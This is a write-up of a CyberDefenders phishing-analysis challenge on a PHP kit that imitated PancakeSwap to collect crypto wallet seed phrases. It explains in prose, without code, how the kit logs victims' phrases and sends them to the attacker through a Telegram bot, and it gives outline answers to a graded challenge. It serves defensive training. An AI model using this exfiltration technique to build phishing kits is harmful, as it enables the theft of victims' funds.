CyberDefenders Write-up: GrabThePhisher

Disclaimer:

All the answers apart from the obvious will be redacted to encourage defenders to try the challenge themselves.

The Prompt:

An attacker compromised a server and impersonated https://pancakeswap.finance/, a decentralized exchange native to BNB Chain, to host a phishing kit at https://apankewk.soup.xyz/mainpage.php. The attacker set it as an open directory with the file name “pankewk.zip”.

Provided the phishing kit, you are requested to analyze it and do your threat intel homework.

1. Which wallet is used for asking the seed phrase?

Locate the phishing kit code and the wallet name is found exposed along with other information helpful for further questions.

The wallet used is exposed in the kit.

2. What is the file name that has the code for the phishing kit?

Those familiar with a PHP website directory structure can locate the phishing kit right away with the filename of the phishing landing page.

3. In which language was the kit written?

As seen in the first screenshot, it is written in PHP.

4. What service does the kit use to retrieve the victim’s machine information?

Observe that the kit is using the file_get_contents PHP method to invoke a GET request via a URL that leads to the service API. And then storing the JSON response in the variable $array. The service whose API was leveraged is visible in plaintext in the URL.

5. How many seed phrases were already collected?

Notice the file in directory where the new data is being appended to. Every new entry is being separated by a newline character before a new entry is appended.

6. Write down the seed phrase of the most recent phishing incident?

All seed phrases are written to the file from Q5. The last one is obviously the most recent one.

7. Which medium had been used for credential dumping?

The attacker was using a Telegram bot to harvest all the wallet seed phrases. The URL indicates the Telegram API being leveraged with the required parameters for the GET query.

8. What is the token for the channel?

Visible in plaintext in phishing kit.

9. What is the chat ID of the phisher’s channel?

Visible in plaintext in phishing kit.

10. What is the alias of the phish kit developer?

Visible in plaintext in phishing kit.

11. What is the full name of the Phish Actor?

For the last two questions, we can use the public Telegram API to make some requests and get the additional information.

The API method being used by the kit is sendMessage .

A quick look at the Telegram API documentation lets you know one of the other methods useful to get the full name and the username which is contained in the Chat object.

The first_name, last_name and username, as mentioned in the docs are of the other party in a private chat. Meaning the attacker in this case.

This is accessed from the Telegram webapp, it is quite a smart technique to exfiltrate data via a telegram bot to the attacker’s personal account. Since the kit is working on the API requests, it requires no authentication on the host side. The bot just needs to be live and it will keep sending back the seed phrases to the attacker from all the phished endpoints.

12. What is the username of the Phish Actor?

Answered in Q11. For additional information like the username of the Telegram bot used, try the getMe method.